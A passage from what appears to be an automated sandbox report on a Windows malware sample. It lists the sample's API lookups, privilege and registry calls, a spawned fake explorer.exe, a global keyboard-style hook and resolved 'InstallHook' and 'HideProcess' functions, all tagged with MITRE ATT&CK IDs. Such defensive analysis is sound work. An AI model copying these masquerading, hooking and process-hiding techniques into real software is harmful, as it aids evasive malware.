\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter FreeResource (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter FindResourceA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter FindNextFileA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter FindFirstFileA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter FindClose (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter FileTimeToDosDateTime (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter DuplicateHandle (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CreateMutexA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CreateDirectoryA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CopyFileA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter TlsSetValue (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter TlsGetValue (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter DeleteCriticalSection (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter LeaveCriticalSection (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter EnterCriticalSection (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSection (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetVersion (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetThreadLocale (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter UnhandledExceptionFilter (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter RtlUnwind (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetStdHandle (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter RegDeleteKeyA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValueA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SetNamedSecurityInfoW (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SysFreeString (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SHGetSpecialFolderLocation (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SHGetPathFromIDListA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SHChangeNotify (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter TranslateMessage (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SetTimer (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SendMessageA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter KillTimer (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetWindowThreadProcessId (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetMessageA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter FindWindowExA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter FindWindowA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter DispatchMessageA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CharUpperBuffA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetKeyboardType (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter MessageBoxA (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter Heap32ListFirst (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter Heap32ListNext (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter Heap32First (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter Heap32Next (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter Toolhelp32ReadProcessMemory (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter Process32FirstW (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter Process32NextW (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter Thread32First (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter Thread32Next (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter Module32Next (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter Module32FirstW (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter Module32NextW (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005784)\n \"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005784)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter InstallHook (UID: 00000000-00005848)\n \"explorer.exe\" called \"GetProcAddress\" with a parameter HideProcess (UID: 00000000-00005848)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03ee96a@advapi32.dll\"\n \"0e000f00703fe96a@advapi32.dll\"\n \"0e000f00cc3fe96a@advapi32.dll\"\n \"11001200b447e96a@advapi32.dll\"\n \"110012004848e96a@advapi32.dll\"\n \"120013008c48e96a@advapi32.dll\"\n \"12001300e448e96a@advapi32.dll\"\n \"14001500386ee96a@advapi32.dll\"\n \"14001500506ee96a@advapi32.dll\"\n \"14001500686ee96a@advapi32.dll\"\n \"17001800806ee96a@advapi32.dll\"\n \"0d000e00986ee96a@advapi32.dll\"\n \"11001200a86ee96a@advapi32.dll\"\n \"11001200bc6ee96a@advapi32.dll\"\n \"0d000e003449e96a@shell32.dll\"\n \"0d000e00b049e96a@shell32.dll\"\n \"0f001000fc6fe96a@advapi32.dll\"\n \"140015003c70e96a@advapi32.dll\"\n \"140015005470e96a@advapi32.dll\"\n \"0c000d009c70e96a@advapi32.dll\"\n \"0c000d00ac70e96a@advapi32.dll\"\n \"0e000f00bc70e96a@advapi32.dll\"\n \"0e000f00cc70e96a@advapi32.dll\"\n \"0b000c00dc70e96a@advapi32.dll\"\n \"180019001473e96a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005784)\n \"explorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005848)\n \"explorer.exe\" called \"CreateDirectoryA\" with parameter C:\\MFILES (UID: 00000000-00005848)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a.exe\" called \"CreateProcessA\" with parameter \"%COMMONPROGRAMFILES%\\Microsoft Shared\\explorer.exe\" - (UID: 00000000-00005784)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-71", "type": 6, "relevance": 10, "name": "Sets a windows hook", "description": "\"explorer.exe\" sets a global windows hook with filter \"WH_CBT\"", "origin": "API Call", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-224", "type": 6, "relevance": 1, "name": "Calls an API typically used to move file or directory", "description": "\"explorer.exe\" called \"MoveFileA\" with parameter 